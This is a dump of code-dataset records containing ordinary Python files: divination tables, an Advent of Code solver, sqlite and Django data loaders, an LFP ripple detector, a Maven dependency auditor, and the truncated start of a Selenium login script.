u\"未\":u\"墓\", u\"申\":u\"绝\", u\"酉\":u\"胎\", u\"戌\":u\"养\", u\"亥\":u\"长生\"},\n \n u\"火\":{u\"子\":u\"胎\", u\"丑\":u\"养\", u\"寅\":u\"长生\", u\"卯\":u\"沐浴\", u\"辰\":u\"冠带\", u\"巳\":u\"临官\", \\\n u\"午\":u\"帝旺\", u\"未\":u\"衰\", u\"申\":u\"病\", u\"酉\":u\"死\", u\"戌\":u\"墓\", u\"亥\":u\"绝\"},\n \n u\"土\":{u\"子\":u\"帝旺\", u\"丑\":u\"衰\", u\"寅\":u\"病\", u\"卯\":u\"死\", u\"辰\":u\"墓\", u\"巳\":u\"绝\", \\\n u\"午\":u\"胎\", u\"未\":u\"养\", u\"申\":u\"长生\", u\"酉\":u\"沐浴\", u\"戌\":u\"冠带\", u\"亥\":u\"临官\"},\n \n u\"金\":{u\"子\":u\"死\", u\"丑\":u\"墓\", u\"寅\":u\"绝\", u\"卯\":u\"胎\", u\"辰\":u\"养\", u\"巳\":u\"长生\", \\\n u\"午\":u\"沐浴\", u\"未\":u\"冠带\", u\"申\":u\"临官\", u\"酉\":u\"帝旺\", u\"戌\":u\"衰\", u\"亥\":u\"病\"},\n \n u\"水\":{u\"子\":u\"帝旺\", u\"丑\":u\"衰\", u\"寅\":u\"病\", u\"卯\":u\"死\", u\"辰\":u\"墓\", u\"巳\":u\"绝\", \\\n u\"午\":u\"胎\", u\"未\":u\"养\", u\"申\":u\"长生\", u\"酉\":u\"沐浴\", u\"戌\":u\"冠带\", u\"亥\":u\"临官\"}\n }\n\nDIZHI_LIUHE = [(u\"子\",u\"丑\"), (u\"寅\",u\"亥\"), (u\"卯\",u\"戌\"), (u\"辰\",u\"酉\"), (u\"巳\",u\"申\"), (u\"午\", u\"未\")]\nDIZHI_LIUCHONG = [(u\"子\",u\"午\"), (u\"丑\", u\"未\"), (u\"寅\",u\"申\"), (u\"卯\",u\"酉\"), (u\"辰\",u\"戌\"), (u\"巳\",u\"亥\")]\nDIZHI_BIFU = [(u\"子\",u\"亥\"), (u\"丑\",u\"辰\"), (u\"寅\",u\"卯\"), (u\"辰\",u\"未\"), (u\"巳\",u\"午\"), (u\"未\", u\"戌\"), (u\"申\", u\"酉\")]\n\nWUXING_SHENKE = {\n u\"金\":{u\"金\":u\"\", u\"木\":u\"克\", u\"水\":u\"生\", u\"火\":u\"耗\", u\"土\":u\"泄\"},\n u\"木\":{u\"金\":u\"耗\", u\"木\":u\"\", u\"水\":u\"泄\", u\"火\":u\"生\", u\"土\":u\"克\"},\n u\"水\":{u\"金\":u\"泄\", u\"木\":u\"生\", u\"水\":u\"\", u\"火\":u\"克\", u\"土\":u\"耗\"},\n u\"火\":{u\"金\":u\"克\", u\"木\":u\"泄\", u\"水\":u\"耗\", u\"火\":u\"\", u\"土\":u\"生\"},\n u\"土\":{u\"金\":u\"生\", u\"木\":u\"耗\", u\"水\":u\"克\", u\"火\":u\"泄\", u\"土\":u\"\"}\n }\n\nDIZHI_WUXING = {u\"子\":u\"水\", u\"丑\":u\"土\", u\"寅\":u\"木\", u\"卯\":u\"木\", u\"辰\":u\"土\", u\"巳\":u\"火\", \\\n u\"午\":u\"火\", u\"未\":u\"土\", u\"申\":u\"金\", u\"酉\":u\"金\", u\"戌\":u\"土\", u\"亥\":u\"水\",\n None:u''}\n\nYAO_ORDER = [u'上爻',u'五爻',u'四爻',u'三爻',u'二爻',u'初爻',]\nYAO_FUHAO = {u'阴':u'- -',u'阳':u'——',u'老阴':u'X',u'老阳':u'O'}\n\nXUNKONG = [{'xun':[u'甲子',u'乙丑',u'丙寅',u'丁卯',u'戊辰',u'己巳',u'庚午',u'辛未',u'壬申',u'癸酉'], 'kongwang':[u'戌',u'亥']},\n{'xun':[u'甲戌',u'乙亥',u'丙子',u'丁丑',u'戊寅',u'己卯',u'庚辰',u'辛巳',u'壬午',u'癸未'],'kongwang':[u'申',u'酉']},\n{'xun':[u'甲申',u'乙酉',u'丙戌',u'丁亥',u'戊子',u'己丑',u'庚寅',u'辛卯',u'壬辰',u'癸巳'],'kongwang':[u'午',u'未']},\n{'xun':[u'甲午',u'乙未',u'丙申',u'丁酉',u'戊戌',u'己亥',u'庚子',u'辛丑',u'壬寅',u'癸卯'],'kongwang':[u'辰',u'巳']},\n{'xun':[u'甲辰',u'乙巳',u'丙午',u'丁未',u'戊申',u'己酉',u'庚戌',u'辛亥',u'壬子',u'癸丑'],'kongwang':[u'寅',u'卯']},\n{'xun':[u'甲寅',u'乙卯',u'丙辰',u'丁巳',u'戊午',u'己未',u'庚申',u'辛酉',u'壬戌',u'癸亥'],'kongwang':[u'子',u'丑']}]\n\nclass Liuyao():\n def __init__(self):\n self.guainfo = None\n \n def load_conf(self):\n pass\n \n def load_data(self, guainfo):\n self.guainfo = guainfo\n self.month = guainfo.month\n self.day = guainfo.day\n self.shen = guainfo.shen\n self.gua = guainfo.gua\n #print self.month, self.month, self.shen\n \n \n# 世应\n# 动静\n#\n# 临月\n# 临日\n# 旬空\n# 五行四时旺相休囚\n# 月地支(六合,六冲,比扶)\n# 月五行寄生\n# 月五行生克\n# 日地支(六合,六冲,比扶)\n# 日五行寄生\n# 日五行生克\n def power(self, month, day, najia):\n row = dict()\n month_dizhi = month[1]\n day_dizhi = day[1]\n \n if najia == month_dizhi:\n row[\"linyue\"] = True\n if najia == day_dizhi:\n row[\"linri\"] = True\n \n row['xunkong'] = False\n for xun in XUNKONG:\n if day in xun['xun']:\n if najia in xun['kongwang']:\n row['xunkong'] = True\n \n najia_wuxing = DIZHI_WUXING[najia]\n row['sishi'] = SISHI_WXXQ[najia_wuxing][month_dizhi]\n \n row['yuedizhi'] = []\n if (month_dizhi, najia) in DIZHI_LIUHE:\n row['yuedizhi'].append(u'六合')\n if (najia, month_dizhi) in DIZHI_LIUHE:\n row['yuedizhi'].append(u'六合')\n \n if (month_dizhi, najia) in DIZHI_LIUCHONG:\n row['yuedizhi'].append(u'六冲')\n if (najia, month_dizhi) in DIZHI_LIUCHONG:\n row['yuedizhi'].append(u'六冲')\n \n if (month_dizhi, najia) in DIZHI_BIFU:\n row['yuedizhi'].append(u'比扶')\n if (najia, month_dizhi) in DIZHI_BIFU:\n row['yuedizhi'].append(u'比扶')\n \n row['yuejisheng'] = WUXING_JISHENG[najia_wuxing][month_dizhi]\n \n row['yueshengke'] = WUXING_SHENKE[DIZHI_WUXING[month_dizhi]][najia_wuxing]\n \n row['ridizhi'] = []\n if (day_dizhi, najia) in DIZHI_LIUHE:\n row['ridizhi'].append(u'六合')\n if (najia, day_dizhi) in DIZHI_LIUHE:\n row['ridizhi'].append(u'六合')\n \n if (day_dizhi, najia) in DIZHI_LIUCHONG:\n row['ridizhi'].append(u'六冲')\n if (najia, day_dizhi) in DIZHI_LIUCHONG:\n row['ridizhi'].append(u'六冲')\n \n if (day_dizhi, najia) in DIZHI_BIFU:\n row['ridizhi'].append(u'比扶')\n if (najia, day_dizhi) in DIZHI_BIFU:\n row['ridizhi'].append(u'比扶')\n \n row['rijisheng'] = WUXING_JISHENG[najia_wuxing][day_dizhi]\n \n row['rishengke'] = WUXING_SHENKE[DIZHI_WUXING[day_dizhi]][najia_wuxing]\n \n return row\n \n \n \n \n\n def calc(self):\n bengua = ''\n biangua = ''\n bian_pattern = []\n for i, yao in enumerate(self.gua):\n if yao == u'阴':\n bengua = bengua + u'阴'\n biangua = biangua + u'阴'\n if yao == u'阳':\n bengua = bengua + u'阳'\n biangua = biangua + u'阳'\n if yao == u'老阴':\n bengua = bengua + u'阴'\n biangua = biangua + u'阳'\n bian_pattern.append((i,yao))\n if yao == u'老阳':\n bengua = bengua + u'阳'\n biangua = biangua + u'阴'\n bian_pattern.append((i,yao))\n \n bengua_bin = ''\n biangua_bin = ''\n for yao in bengua:\n if yao == u'阴':\n bengua_bin = bengua_bin + '0'\n if yao == u'阳':\n bengua_bin = bengua_bin + '1'\n \n for yao in biangua:\n if yao == u'阴':\n biangua_bin = biangua_bin + '0'\n if yao == u'阳':\n biangua_bin = biangua_bin + '1'\n \n bengua_najia = {}\n biangua_najia = {}\n for gua in GUA_64:\n if gua['pattern'] == bengua_bin:\n bengua_najia = gua\n if gua['pattern'] == biangua_bin:\n biangua_najia = gua\n \n liuyao_info = {}\n liuyao_info['shen'] = self.shen\n liuyao_info['month'] = self.month\n liuyao_info['day'] = self.day\n liuyao_info['bengua'] = bengua_najia['name']\n liuyao_info['bengua_house'] = bengua_najia['house']\n liuyao_info['biangua'] = biangua_najia['name']\n liuyao_info['biangua_house'] = biangua_najia['house']\n \n gua_table = []\n for i in range(6):\n gua_row = {}\n gua_row['yao'] = YAO_ORDER[i]\n gua_row['gua'] = YAO_FUHAO[self.gua[i]]\n gua_row['bengua'] = YAO_FUHAO[bengua[i]]\n gua_row['bengua_liuqin'] = bengua_najia['guashen'][i]['liuqin']\n gua_row['bengua_najia'] = bengua_najia['guashen'][i]['najia']\n gua_row['bengua_wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n gua_row['bengua_shiying'] = bengua_najia['guashen'][i]['shiying']\n gua_row['bengua_fushen'] = bengua_najia['guashen'][i]['fushen']\n gua_row['bengua_funajia'] = bengua_najia['guashen'][i]['funajia']\n gua_row['bengua_fuwuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['funajia']]\n for (j, yao) in bian_pattern:\n if i == j:\n gua_row['bian'] = '——>'\n gua_row['biangua'] = YAO_FUHAO[biangua[i]]\n gua_row['biangua_liuqin'] = biangua_najia['guashen'][i]['liuqin']\n gua_row['biangua_najia'] = biangua_najia['guashen'][i]['najia']\n gua_row['biangua_wuxing'] = DIZHI_WUXING[biangua_najia['guashen'][i]['najia']]\n gua_row['biangua_shiying'] = biangua_najia['guashen'][i]['shiying']\n gua_row['biangua_fushen'] = biangua_najia['guashen'][i]['fushen']\n gua_row['biangua_funajia'] = biangua_najia['guashen'][i]['funajia']\n gua_row['biangua_fuwuxing'] = DIZHI_WUXING[biangua_najia['guashen'][i]['funajia']]\n \n gua_table.append(gua_row)\n \n bengua_table = []\n fushen_table = []\n biangua_table = []\n for i in range(6):\n bengua_row = self.power(self.month,self.day,bengua_najia['guashen'][i]['najia'])\n bengua_row['yao'] = YAO_ORDER[i]\n bengua_row['gua'] = YAO_FUHAO[bengua[i]]\n bengua_row['liuqin'] = bengua_najia['guashen'][i]['liuqin']\n bengua_row['najia'] = bengua_najia['guashen'][i]['najia']\n bengua_row['wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n bengua_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n \n bengua_row['dongjing'] = u'静'\n for (j, yao) in bian_pattern:\n if i == j:\n bengua_row['dongjing'] = u'动'\n biangua_row = self.power(self.month,self.day,biangua_najia['guashen'][i]['najia'])\n biangua_row['yao'] = YAO_ORDER[i]\n biangua_row['gua'] = YAO_FUHAO[bengua[i]]\n biangua_row['liuqin'] = bengua_najia['guashen'][i]['liuqin']\n biangua_row['najia'] = bengua_najia['guashen'][i]['najia']\n biangua_row['wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n biangua_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n biangua_row['biangua'] = YAO_FUHAO[biangua[i]]\n biangua_row['biangua_liuqin'] = biangua_najia['guashen'][i]['liuqin']\n biangua_row['biangua_najia'] = biangua_najia['guashen'][i]['najia']\n biangua_row['biangua_wuxing'] = DIZHI_WUXING[biangua_najia['guashen'][i]['najia']]\n biangua_table.append(biangua_row)\n \n bengua_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n bengua_table.append(bengua_row)\n if not bengua_najia['guashen'][i]['fushen'] == None:\n fushen_row = self.power(self.month,self.day,bengua_najia['guashen'][i]['funajia'])\n fushen_row['yao'] = YAO_ORDER[i]\n fushen_row['gua'] = YAO_FUHAO[bengua[i]]\n fushen_row['liuqin'] = bengua_najia['guashen'][i]['liuqin']\n fushen_row['najia'] = bengua_najia['guashen'][i]['najia']\n fushen_row['wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n fushen_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n fushen_row['fushen'] = bengua_najia['guashen'][i]['fushen']\n fushen_row['funajia'] = bengua_najia['guashen'][i]['funajia']\n fushen_row['fuwuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['funajia']]\n fushen_table.append(fushen_row)\n \n \n \n return (liuyao_info, gua_table, bengua_table, fushen_table, biangua_table)\n \n \n \n ","sub_path":"astro_render/liuyao.py","file_name":"liuyao.py","file_ext":"py","file_size_in_byte":14012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"141250973","text":"#!/usr/bin/env python-mr\n\nfrom collections import defaultdict\nfrom itertools import permutations\nfrom _.data.formatting.blocks import Block\nfrom _.command_line.flags import Flag\n\ndef intersection(sets):\n result = sets[0]\n for s in sets[1:]:\n result = result.intersection(s)\n return result\n\n\nclass BitSegments:\n @staticmethod\n def to_int(segments):\n out = 0\n for s in segments:\n offset = ord(s) - ord(\"a\")\n out += (1 << offset)\n return out\n\n @staticmethod\n def to_str(segments):\n out = \"\"\n offset = 0\n while segments:\n if segments & 1:\n o = offset + ord(\"a\")\n out += chr(o)\n offset += 1\n segments = segments >> 1\n return offset\n\n\nclass BrokenDisplaySegment:\n DIGITS = {\n 1: \"cf\",\n 7: \"acf\",\n 4: \"bcdf\",\n 2: \"acdeg\",\n 3: \"acdfg\",\n 5: \"abdfg\",\n 0: \"abcefg\",\n 6: \"abdefg\",\n 9: \"abcdfg\",\n 8: \"abcdefg\",\n }\n\n CHARACTERS = {value: key for key, value in DIGITS.items()}\n CHARACTERS_B = {BitSegments.to_int(value): key for key, value in DIGITS.items()}\n\n @staticmethod\n def parse(string):\n patterns = string.strip().split(\" \")\n patterns.sort(key=len)\n return BrokenDisplaySegment(patterns)\n\n def __init__(self, patterns):\n self._patterns = patterns\n self._map = None\n self._bmap = None\n\n def solve(self) -> str:\n if self._map:\n return self._map\n\n # Patterns already sorted for length\n pats = [set(p) for p in self._patterns]\n one, seven, four, mtwo, mthree, mfive, *zerosixnine, eight = pats\n\n #print(one, seven, four)\n a = seven.difference(one).pop()\n cf = seven.intersection(one)\n # have top, bottom, middle all together.\n adg = intersection((mtwo, mthree, mfive))\n d = four.intersection(adg).pop()\n b = four.difference(one).difference(d).pop()\n g = adg.difference(a + d).pop()\n\n zero, = [by for by in zerosixnine if d not in by]\n sixnine = [by for by in zerosixnine if d in by]\n\n ce = sixnine[0].symmetric_difference(sixnine[1])\n c = cf.intersection(ce).pop()\n e = ce.difference(c).pop()\n f = cf.difference(c).pop()\n\n mapped = a + b + c + d + e + f + g\n self._map = { m: char for m, char in zip(mapped, \"abcdefg\")}\n return self._map\n\n def solve_bits(self):\n if self._bmap:\n return self._bmap\n\n # Patterns already sorted by length\n pats = [BitSegments.to_int(p) for p in self._patterns]\n one, seven, four, mtwo, mthree, mfive, *zerosixnine, eight = pats\n\n a = one ^ seven\n cf = seven & one\n # have top, bottom, middle all together.\n adg = mtwo & mthree & mfive\n d = four & adg\n b = (four ^ one) ^ d\n g = adg ^ (a | d)\n\n zero, = [by for by in zerosixnine if not d & by]\n msix, mnine = [by for by in zerosixnine if d & by]\n\n ce = msix ^ mnine\n c = cf & ce\n e = ce ^ c\n f = cf ^ c\n\n bmap = {\n a: \"a\",\n b: \"b\",\n c: \"c\",\n d: \"d\",\n e: \"e\",\n f: \"f\",\n g: \"g\",\n }\n self._bmap = {key: BitSegments.to_int(value) for key, value in bmap.items()}\n return self._bmap\n\n def find_digit(self, display_digit: str):\n mapping = self.solve()\n remapped = [mapping[d] for d in display_digit]\n remapped.sort()\n return BrokenDisplaySegment.CHARACTERS[\"\".join(remapped)]\n\n def find_digit_(self, display_digit: str):\n mapping = self.solve_bits()\n remap = 0\n for d in display_digit:\n remap |= mapping[BitSegments.to_int(d)]\n return BrokenDisplaySegment.CHARACTERS_B[remap]\n\n\nLOAD = \"content\"\ndef REWRITE(lines):\n l = []\n for line in lines:\n patterns, digits = line.split(\"|\")\n display = BrokenDisplaySegment.parse(patterns)\n digits = digits.strip().split(\" \")\n l.append((display, digits))\n return l\n\n\ndef PART1(inputs):\n counts = defaultdict(int)\n for display, digits in inputs:\n real = [display.find_digit(d) for d in digits]\n for r in real:\n counts[r] += 1\n\n return counts[1] + counts[4] + counts[7] + counts[8]\n\n\ndef as_int(a, b, c, d):\n return a * 1000 + b * 100 + c * 10 + d\n\n\ndef PART2(inputs):\n sum = 0\n for display, digits in inputs:\n value = as_int(*[display.find_digit(d) for d in digits])\n sum += value\n\n return sum\n","sub_path":"2021/day-08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"338456120","text":"import sqlite3\n\n# Connect to database\nconn = sqlite3.connect(\"customers.db\")\n\n# Create a cursor\nc = conn.cursor()\n\n# Ordering results\n# AND & OR add more conditions to your WHERE cause\nc.execute(\"SELECT rowid, * FROM customers WHERE last_name LIKE 'custumer%' AND rowid = 2\")\n# This works like any logical condition\n\n# Commit changes to db\nconn.commit()\n\n# Only to verify that changes have been done we will print it to screen\nc.execute(\"SELECT * FROM customers\")\n\nprint(c.fetchall())\n\n# Close connection to db\nconn.close()\n","sub_path":"andOr.py","file_name":"andOr.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4852287","text":"import csv\nfrom csv import DictReader\nimport urllib.request\nimport io\n\nfrom django.core.management import BaseCommand\n\nfrom airbnbtech.models import FinalLocation, Location, Transportation, Food, Crime\n\ncrime_url = 'https://data.boston.gov/dataset/6220d948-eae2-4e4b-8723-2dc8e67722a3/resource/12cb3883-56f5-47de-afa5-3b1cf61b257b/download/tmp8npb60c9.csv'\n# crime_url = 'https://raw.githubusercontent.com/CCalderon01/techtogether/crimedataadd/mock_data.csv'\ncontents = urllib.request.urlopen(crime_url)\ndatareader = csv.reader(io.TextIOWrapper(contents))\nlistData = list(datareader)\n\nindex_offense_code = 1\nindex_district = 4\nindex_latitude = 14\nindex_longitude = 15\n\nALREADY_LOADED_ERROR_MESSAGE = \"\"\"\nIf you need to reload the airbnb data from the CSV file,\nfirst delete the db.sqlite3 file to destroy the database.\nThen, run `python manage.py migrate` for a new empty\ndatabase with tables\"\"\"\n\ndef CheckDataValid(row_to_check):\n data = []\n for cell_t in row_to_check:\n data.append(cell_t)\n cell = data[index_district].replace(\"\\'\",\"\")\n cell = cell.replace(\" \",\"\")\n if not cell:\n return False\n else:\n return True\n\nclass Command(BaseCommand):\n # Show this when the user types help\n help = \"Loads data from listings.csv into our airbnb model\"\n\n def handle(self, *args, **options):\n if FinalLocation.objects.exists() or Location.objects.exists() or Transportation.objects.exists() or Food.objects.exists():\n print('Airbnb data already loaded...exiting.')\n print(ALREADY_LOADED_ERROR_MESSAGE)\n return\n print(\"Loading airbnb data\")\n for row in DictReader(open('./listings.csv')):\n location = Location()\n location.name = row['name']\n location.url = row['listing_url']\n location.id = row['id']\n location.neighborhood = row['neighbourhood_cleansed']\n location.zip_code = row['zipcode']\n location.latitude = row['latitude']\n location.longitude = row['longitude']\n location.room_type = row['room_type']\n location.accomodates = row['accommodates']\n location.price = row['price']\n location.review_rating = row['review_scores_location']\n location.save()\n header = True\n for row in listData:\n # Checking if the row is a header --> skip\n if header:\n header = False\n continue\n data = []\n for cell in row:\n data.append(cell)\n if CheckDataValid(row):\n crime = Crime()\n crime.latitude = data[index_latitude].replace(\"\\'\",\"\")\n crime.longitude = data[index_longitude].replace(\"\\'\",\"\")\n crime.offense_code = int(data[index_offense_code].replace(\"\\'\",\"\"))\n if(crime.offense_code < 3000):\n crime.save()\n","sub_path":"carolina/techtogether/airbnbtech/management/commands/load_air_bnb_data.py","file_name":"load_air_bnb_data.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"204221871","text":"import numpy as np\nfrom scipy import signal\nimport scipy.stats as stats\nfrom scipy.signal.signaltools import _next_regular\n\nimport matplotlib.pyplot as plt\n\ndef butter_bandpass(lowcut, highcut, fs, lfp, order=4):\n \"\"\" Filters signal using butterworth filter\n\n Parameters\n ----------\n lowcut : float\n Suggested 140.0 for sharp-wave ripple detection.\n highcut : float\n Suggested 250.0 for sharp-wave ripple detection.\n fs : int\n Eg. 2000. Should get this from experiment-specifics.\n lfp : np.array\n Eg. csc['data']\n order : int\n Default set to 4.\n\n Returns\n -------\n filtered_butter : np.array\n\n \"\"\"\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = signal.butter(order, [low, high], btype='band')\n filtered_butter = signal.filtfilt(b, a, lfp)\n return filtered_butter\n\n\ndef detect_swr_hilbert(csc, fs=2000, lowcut=140.0, highcut=250.0,\n z_thres=3, power_thres=3, merge_thres=0.02, min_length=0.01):\n \"\"\" Finds sharp-wave ripple (SWR) times and indices.\n\n Parameters\n ----------\n csc : dict\n With time(np.array), data(np.array) as keys\n fs : int\n Experiment-specific, something in the range of 2000 is not unexpected.\n lowcut : float\n The default is set to 140.0\n highcut : float\n The default is set to 250.0\n z_thres : int or float\n The default is set to 5\n power_thres : int or float\n The default is set to 4\n merge_thres : int or float\n The default is set to 0.0\n min_length : float\n Any sequence less than this amount is not considered a sharp-wave ripple.\n The default is set to 0.02.\n\n Returns\n -------\n swr_times : dict\n With start(float), stop(float) as keys\n swr_idx : dict\n With start(int), stop(int) as keys\n filtered_butter : np.array\n Mostly for plotting purposes\n\n \"\"\"\n n_samples = len(csc['data'])\n\n # Filtering signal with butterworth fitler\n filtered_butter = butter_bandpass(lowcut, highcut, fs, csc['data'])\n\n # Get LFP power (using Hilbert) and z-score the power\n # Zero padding to nearest regular number to speed up fast fourier transforms (FFT) computed in the hilbert function.\n # Regular numbers are composites of the prime factors 2, 3, and 5.\n hilbert_n = _next_regular(n_samples)\n power_lfp = np.abs(signal.hilbert(filtered_butter, N=hilbert_n))\n power_lfp = power_lfp[:n_samples] # removing the zero padding now that the power is computed\n zpower_lfp = stats.zscore(power_lfp)\n\n # Finding locations where the power changes\n detect = zpower_lfp > z_thres\n detect = np.hstack([0, detect, 0]) # pad to detect first or last element change\n signal_change = np.diff(detect.astype(int))\n\n start_swr_idx = np.where(signal_change == 1)[0]\n stop_swr_idx = np.where(signal_change == -1)[0] - 1\n\n # Getting times associated with these power changes\n start_time = csc['time'][start_swr_idx]\n stop_time = csc['time'][stop_swr_idx]\n\n # Merging ranges that are closer - in time - than the merge_threshold.\n no_double = start_time[1:] - stop_time[:-1]\n merge_idx = np.where(no_double < merge_thres)[0]\n start_merged = np.delete(start_time, merge_idx + 1)\n stop_merged = np.delete(stop_time, merge_idx)\n start_merged_idx = np.delete(start_swr_idx, merge_idx + 1)\n stop_merged_idx = np.delete(stop_swr_idx, merge_idx)\n\n # Removing ranges that are shorter - in time - than the min_length value.\n swr_len = stop_merged - start_merged\n short_idx = np.where(swr_len < min_length)[0]\n start_merged = np.delete(start_merged, short_idx)\n stop_merged = np.delete(stop_merged, short_idx)\n start_merged_idx = np.delete(start_merged_idx, short_idx)\n stop_merged_idx = np.delete(stop_merged_idx, short_idx)\n\n # Removing ranges that have powers less than the power_threshold if sufficiently different.\n if power_thres > z_thres:\n max_z = []\n for start_idx, stop_idx in zip(start_merged_idx, stop_merged_idx):\n max_z.append(np.max(zpower_lfp[start_idx:stop_idx]))\n max_z = np.array(max_z)\n\n z_idx = np.where(max_z < power_thres)[0]\n start_merged = np.delete(start_merged, z_idx)\n stop_merged = np.delete(stop_merged, z_idx)\n start_merged_idx = np.delete(start_merged_idx, z_idx)\n stop_merged_idx = np.delete(stop_merged_idx, z_idx)\n\n swr_idx = dict()\n swr_times = dict()\n swr_times['start'] = start_merged\n swr_times['stop'] = stop_merged\n swr_idx['start'] = start_merged_idx\n swr_idx['stop'] = stop_merged_idx\n\n print('Number of SWR events found: ', str(len(swr_idx['start'])))\n\n return swr_times, swr_idx\n","sub_path":"vdmlab/lfp_filtering.py","file_name":"lfp_filtering.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"121004682","text":"import os\nimport re\nimport sys\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nimport requests\nimport xlwt\nimport subprocess\n\n\nclass Pom(object):\n def __init__(self, path):\n self.path = path\n parse = xml.dom.minidom.parse(path)\n root = parse.documentElement\n artifacts = root.getElementsByTagName('artifactId')\n for artifact in artifacts:\n if artifact.parentNode.tagName == 'project':\n self.module_name = artifact.firstChild.data\n\n\nclass Dependency(object):\n def __init__(self, group_id, artifact_id, version, module):\n self.group_id = group_id\n self.artifact_id = artifact_id\n self.version = version\n self.module = module\n\n def __str__(self):\n return self.group_id + ':' + self.artifact_id + ':' + self.version + '(' + self.module + ')'\n\n def equals(self, target):\n return self.group_id == target.group_id and self.artifact_id == target.artifact_id and self.version == target.version\n\n\ndef search_pom(path):\n result_list = []\n for root, dirs, files in os.walk(path):\n for file in files:\n file_path = os.path.join(root, file)\n if file_path.endswith('pom.xml'):\n result_list.append(Pom(file_path))\n return result_list\n\n\ndef read_file(file_path):\n for root, dirs, files in os.walk(file_path):\n for file in files:\n join = os.path.join(root, file)\n if join.endswith('txt'):\n with open(join, 'r') as r:\n read = r.read()\n split = read.split('\\n')\n for _i in split:\n findall = re.findall('^[^a-zA-Z]*', _i)\n _i = _i.replace(findall[0], '')\n if _i.strip() != '':\n i_split = _i.split(':')\n dependency = Dependency(i_split[0], i_split[1], i_split[3], file.replace('.txt', ''))\n yield dependency\n\n\nif __name__ == '__main__':\n code_path = '/Users/wangxiaolei/Documents/ody/code/baseline/web/ouser'\n settings_xml = '/Users/wangxiaolei/Documents/ody/mvn/2.9.6/settings.xml'\n current_file_path = '/Users/wangxiaolei/Documents/code/workspace/maven'\n mvn_cmd = 'mvn'\n run_cmd = True\n district = True\n warehouse_list = [\n {'name': 'aliyun', 'path': 'https://maven.aliyun.com/nexus/content/groups/public/',\n 'func': lambda text, dependency: text.__contains__(dependency.artifact_id)},\n {'name': 'maven', 'path': 'https://repo.maven.apache.org/maven2/',\n 'func': lambda text, dependency: text.__contains__(dependency.artifact_id)}\n ]\n\n if run_cmd:\n poms = search_pom(code_path)\n size = poms.__len__()\n print('需要执行mvn tree,一共发现%s个pom.xml文件' % size)\n run_index = 1\n for i in poms:\n cmd = [mvn_cmd, 'dependency:tree', '-s', settings_xml, '-D',\n 'outputFile=' + current_file_path + '/' + i.module_name + '.txt', '-f', i.path]\n print('开始执行第 %s/%s 个,命令为 %s' % (run_index, size, cmd))\n subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)\n print('第 %s/%s 个执行成功!' % (run_index, size))\n run_index = run_index + 1\n print('mvn tree全部执行完成!')\n\n dependency_list = []\n for i in read_file(current_file_path):\n if district:\n has_in = False\n for j in dependency_list:\n if j.equals(i):\n has_in = True\n break\n if not has_in:\n dependency_list.append(i)\n else:\n dependency_list.append(i)\n workbook = xlwt.Workbook(encoding='utf-8')\n sheet = workbook.add_sheet('sheet')\n\n row = 1\n sheet.write(0, 0, 'groupId')\n sheet.write(0, 1, 'artifactId')\n sheet.write(0, 2, 'version')\n sheet.write(0, 3, '是否自建')\n sheet.write(0, 4, '哪个module引用的')\n sheet.write(0, 5, '在哪个仓库找到')\n\n total = dependency_list.__len__()\n print('一共有%s个依赖需要处理' % total)\n\n self_build = 0\n global_build = 0\n\n for i in dependency_list:\n full_url = '/'.join(i.group_id.split(\n '.')) + '/' + i.artifact_id + '/' + i.version + '/' + i.artifact_id + '-' + i.version + '.pom'\n exist = False\n for j in warehouse_list:\n real_path = j['path'] + full_url\n exist = j['func'](requests.get(real_path).text, i)\n if exist:\n sheet.write(row, 0, i.group_id)\n sheet.write(row, 1, i.artifact_id)\n sheet.write(row, 2, i.version)\n sheet.write(row, 3, 'false')\n if district:\n sheet.write(row, 4, i.module)\n sheet.write(row, 5, j['name'])\n else:\n sheet.write(row, 4, j['name'])\n row = row + 1\n global_build = global_build + 1\n break\n if not exist:\n sheet.write(row, 0, i.group_id)\n sheet.write(row, 1, i.artifact_id)\n sheet.write(row, 2, i.version)\n sheet.write(row, 3, 'true')\n if district:\n sheet.write(row, 4, i.module)\n row = row + 1\n self_build = self_build + 1\n print('目前处理进度%s/%s,其中自建的%s个,公共的%s个' % (self_build + global_build, total, self_build, global_build))\n print('处理完成,开始保存excel')\n workbook.save('./dependency.xls')\n print('excel保存成功!')\n","sub_path":"maven/maven_api.py","file_name":"maven_api.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"298905744","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common import by\nfrom datetime import datetime, timedelta\nfrom selenium.webdriver.remote.switch_to import SwitchTo\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport shutil\nimport os\nimport glob\nimport time\nmanana= datetime.today() + timedelta(days=1)\nfecha=\"activacion_\"+str(manana.strftime(\"%d%m%y\"))+\".xlsx\"\n\n\ndriver=webdriver.Chrome(executable_path=r'./chromedriver.exe')\n\ndriver.get('https://recargas.claro.com.ni:4446/pretups/')\n\ntxt_usuario='#loginID'\ntxt_contraseña='#password'\nbtn_entrar_sistema='body > form:nth-child(2) > table:nth-child(6) > tbody > tr > td > 